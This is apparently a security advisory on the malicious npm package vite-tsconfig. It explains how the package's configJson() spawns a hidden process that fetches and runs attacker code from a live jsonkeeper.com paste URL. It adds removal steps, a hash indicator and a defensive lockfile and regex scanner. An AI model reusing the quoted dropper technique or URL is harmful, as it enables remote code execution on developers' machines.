Malicious package

vite-tsconfig (npm)

Malicious code in vite-tsconfig (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5576

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall vite-tsconfig

What this malware does

The package is named vite-tsconfig and replicates the public API of the legitimate tsconfig-paths library (register, loadConfig, createMatchPath, matchFromAbsolutePaths), but adds an extra exported function, configJson, that is not present upstream.

When a consumer calls configJson(), lib/config-loader.js spawns node lib/mapProps.js as a detached child process with stdio suppressed (child_process.spawn with detached:true, followed by child.unref()). lib/mapProps.js then issues axios.get('https://www.jsonkeeper.com/b/5IZTJ') with the header x-secret-key: _, takes response.data.Cookie, and executes it as JavaScript with full Node capability via new Function('require', s)(require), retried up to 5 times.

jsonkeeper.com is an anonymous public JSON paste host, so the executed payload is mutable and attacker-controlled, giving the publisher arbitrary remote code execution on any machine where a consumer invokes the documented configJson API.

The remote URL is camouflaged as DEV_API_KEY inside a fake process.env shadow object, and the loader is wrapped in pino-logger-shaped config (messageKey/levels in lib/config-loader.js) to disguise the dropper. The README references vite-json and dividab/tsconfig-paths, confirming the impersonation framing.
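A defender-side check for the behaviour described above, as an added example that is not part of the advisory or of the package: it looks for the flagged version in a parsed package-lock.json and reports which of the described dropper traits appear in a JavaScript source string. The function names, trait names and sample inputs are assumptions constructed for illustration.

```javascript
// Added example. Package name and version come from the advisory; the regexes
// are heuristics for the described behaviour, not signatures of the real files.
const FLAGGED = { name: 'vite-tsconfig', versions: ['1.1.0'] };
const isFlagged = (name, version) =>
  name === FLAGGED.name && FLAGGED.versions.includes(version);

// Handles lockfile v2/v3 ("packages" map) and v1 (nested "dependencies").
function findFlagged(lock) {
  const hits = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      // Keys look like "node_modules/a/node_modules/b"; last segment is the name.
      const name = meta.name || path.split('node_modules/').pop();
      if (isFlagged(name, meta.version)) hits.push(`${path}@${meta.version}`);
    }
    return hits;
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      if (isFlagged(name, meta.version)) hits.push(`${trail}${name}@${meta.version}`);
      walk(meta.dependencies, `${trail}${name} > `);
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

const TRAITS = {
  detachedSpawn: /\bspawn\s*\([^)]*detached\s*:\s*true/,
  unrefChild: /\.unref\s*\(\s*\)/,
  evalWithRequire: /new\s+Function\s*\(\s*['"]require['"]/,
  pasteHostFetch: /jsonkeeper\.com\/b\//i,
};
// Returns the names of the traits present in a JS source string.
const dropperTraits = (src) => Object.keys(TRAITS).filter((k) => TRAITS[k].test(src));

// Constructed sample inputs (not the real package contents).
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '0.0.1' },
    'node_modules/vite': { version: '5.0.0' },
    'node_modules/vite-tsconfig': { version: '1.1.0' },
  },
};
const sampleSource =
  "const child = spawn('node', ['lib/mapProps.js'], { detached: true, stdio: 'ignore' });\nchild.unref();";

console.log(findFlagged(sampleLock), dropperTraits(sampleSource));
```

A trait hit in a dependency is a prompt for manual review rather than a verdict, since detached spawns and unref() also occur in legitimate tooling.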

Malicious versions

1 flagged
1.1.0

Indicators of compromise (SHA-256)

142b4a600291ebf355bb7915c082c34b329e58026dc3c1f181a5b1865c16cff9

Frequently asked questions

No. vite-tsconfig on npm has been identified as a malicious package (version 1.1.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005599

Credits

  • Amazon Inspector · finder

vite-tsconfig (npm) malicious package — MAL-2026-5576 | O3 Security